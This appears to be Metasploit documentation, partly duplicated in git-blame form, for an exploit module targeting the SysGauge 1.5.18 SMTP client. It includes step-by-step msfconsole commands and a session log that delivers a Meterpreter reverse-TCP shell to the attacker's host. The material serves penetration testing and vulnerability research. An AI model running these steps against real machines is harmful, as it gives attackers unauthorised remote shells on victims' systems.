documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md

## Vulnerable Application

  This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.

  The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
  4. Do: ```set payload windows/meterpreter/reverse_tcp```
  5. Do: ```set LHOST ip```
  6. Do: ```run```
  7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
in the program, and hit the "Verify Email ..." button.
  8. You should get a shell.

## Scenarios

  Here is how to typically execute the module. Note that the client must input this SMTP server
  information under SysGauge Options and hit the "Verify Email ..." button.

  ```
  msf > use exploit/windows/smtp/sysgauge_client_bof
  msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
  lhost => 10.0.0.1
  msf exploit(sysgauge_client_bof) > exploit
  [*] Exploit running as background job.
  msf exploit(sysgauge_client_bof) >
  [*] Started reverse TCP handler on 10.0.0.1:4444
  [*] Server started.
  [*] Client connected: 10.0.0.128
  [*] Sending payload...
  [*] Sending stage (957487 bytes) to 10.0.0.128
  [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
  ```
Add sysgauge_client_bof module and documentation 2017-03-14 23:29:19 -05:00			`## Vulnerable Application`

Updated documentation and fixed module header. Whoops, copy/paste fail. 2017-03-16 21:28:24 -05:00			`This module will setup an SMTP server expecting a connection from SysGauge 1.5.18`
Add sysgauge_client_bof module and documentation 2017-03-14 23:29:19 -05:00			`via its SMTP server validation. The module sends a malicious response along in the`
Updated documentation and fixed module header. Whoops, copy/paste fail. 2017-03-16 21:28:24 -05:00			`220 service ready response and exploits the client, resulting in an unprivileged shell.`

Fixed a spelling error in documentation 2017-12-09 02:30:42 -06:00			`The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).`
Add sysgauge_client_bof module and documentation 2017-03-14 23:29:19 -05:00
			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
			4. Do: ```set payload windows/meterpreter/reverse_tcp```
			5. Do: ```set LHOST ip```
			6. Do: ```run```
			7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
			`in the program, and hit the "Verify Email ..." button.`
			`8. You should get a shell.`

			`## Scenarios`

			`Here is how to typically execute the module. Note that the client must input this SMTP server`
			`information under SysGauge Options and hit the "Verify Email ..." button.`

			```
			`msf > use exploit/windows/smtp/sysgauge_client_bof`
			`msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
			`msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1`
			`lhost => 10.0.0.1`
			`msf exploit(sysgauge_client_bof) > exploit`
			`[*] Exploit running as background job.`
			`msf exploit(sysgauge_client_bof) >`
			`[*] Started reverse TCP handler on 10.0.0.1:4444`
			`[*] Server started.`
			`[*] Client connected: 10.0.0.128`
			`[*] Sending payload...`
			`[*] Sending stage (957487 bytes) to 10.0.0.128`
			`[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500`
			```